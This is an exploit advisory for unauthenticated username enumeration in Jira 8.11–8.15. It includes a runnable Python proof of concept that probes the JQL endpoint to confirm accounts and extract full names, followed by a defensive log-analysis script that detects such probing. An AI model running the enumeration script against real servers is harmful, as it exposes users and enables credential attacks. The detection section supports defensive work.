Atlassian Jira 8.15.0 Username Enumeration

2021.06.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
# Date: 31/05/2021
# Exploit Author: Mohammed Aloraimi
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Vulnerable versions: version 8.11.x to 8.15.0
# Tested on: Kali Linux
# Proof Of Concept:

'''
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x.
Unauthenticated users can enumerate valid users via the /secure/QueryComponent!Jql.jspa endpoint.

Tested versions:
Atlassian JIRA 8.11.1
Atlassian JIRA 8.13
Atlassian JIRA 8.15
'''

#!/usr/bin/env python

__author__ = "Mohammed Aloraimi (@ixSly)"

import requests
import sys
import re
import urllib3
urllib3.disable_warnings()

def help():
    print('python script.py <target> <username>')
    print('e.g. python script.py https://jiratarget.com admin')
    sys.exit()

if len(sys.argv) < 3:
    help()

def pwn(url,username):
    try:
        headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
        # JQL query that references the username under test
        data="jql=creator+in+({})&decorator=none".format(username)
        req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
        # HTTP 200 with the field markup present: the username exists
        if "issue.field.project" in req.text and req.status_code == 200:
            print("[+] {} is a Valid User".format(username))
            userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
            if userFullName:
                print("[+] User FullName: " + userFullName.group(1))
        # HTTP 401 with jqlTooComplex: the username does not exist
        elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
            print("[-] {} is not a Valid User".format(username))
        else:
            print("[-] Error..")
    except Exception as e:
        print(str(e))

server = sys.argv[1]
username = sys.argv[2]
pwn(server,username)
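For defenders, the 200/401 split that the proof of concept relies on is also visible in web access logs. The following is an added detection example, not part of the original advisory or the author's script: it counts anonymous POSTs to the endpoint per client. The combined log format, the threshold of 3, the function name and the sample log lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

ENDPOINT = "/secure/QueryComponent!Jql.jspa"  # endpoint named in the advisory
THRESHOLD = 3  # assumed: anonymous POSTs per client before alerting

# Constructed sample lines in combined log format (assumed); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [31/May/2021:10:00:01 +0000] "POST /secure/QueryComponent!Jql.jspa HTTP/1.1" 401 52 "-" "python-requests/2.25.1"
203.0.113.7 - - [31/May/2021:10:00:02 +0000] "POST /secure/QueryComponent!Jql.jspa HTTP/1.1" 401 52 "-" "python-requests/2.25.1"
203.0.113.7 - - [31/May/2021:10:00:03 +0000] "POST /jira/secure/QueryComponent%21Jql.jspa HTTP/1.1" 200 4312 "-" "python-requests/2.25.1"
203.0.113.7 - - [31/May/2021:10:00:04 +0000] "POST /secure/QueryComponent!Jql.jspa HTTP/1.1" 401 52 "-" "python-requests/2.25.1"
198.51.100.20 - alice [31/May/2021:10:01:00 +0000] "POST /secure/QueryComponent!Jql.jspa HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.20 - - [31/May/2021:10:01:05 +0000] "POST /secure/QueryComponent!Jql.jspa HTTP/1.1" 401 52 "-" "Mozilla/5.0"
192.0.2.15 - - [31/May/2021:10:02:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_enumeration(log_text, threshold=THRESHOLD):
    """Return per-client counters for anonymous POSTs to the JQL endpoint."""
    stats = defaultdict(lambda: {"probes": 0, "confirmed": 0, "rejected": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # Normalise: drop query string / path parameters, decode %21 -> "!"
        path = unquote(m["path"].split("?", 1)[0].split(";", 1)[0])
        if m["method"] != "POST" or not path.endswith(ENDPOINT):
            continue
        if m["user"] != "-":
            continue  # authenticated session: normal issue-search usage
        entry = stats[m["ip"]]
        entry["probes"] += 1
        if m["status"] == "200":    # PoC: 200 means the username exists
            entry["confirmed"] += 1
        elif m["status"] == "401":  # PoC: 401 means it does not
            entry["rejected"] += 1
    return {ip: s for ip, s in stats.items() if s["probes"] >= threshold}

if __name__ == "__main__":
    for ip, s in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} anonymous JQL probes, "
              f"{s['confirmed']} usernames confirmed, {s['rejected']} rejected")
```

Access logs normally do not record POST bodies, so the tested usernames are not recoverable from them; the "confirmed" count only indicates how many account names the client may have learned.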

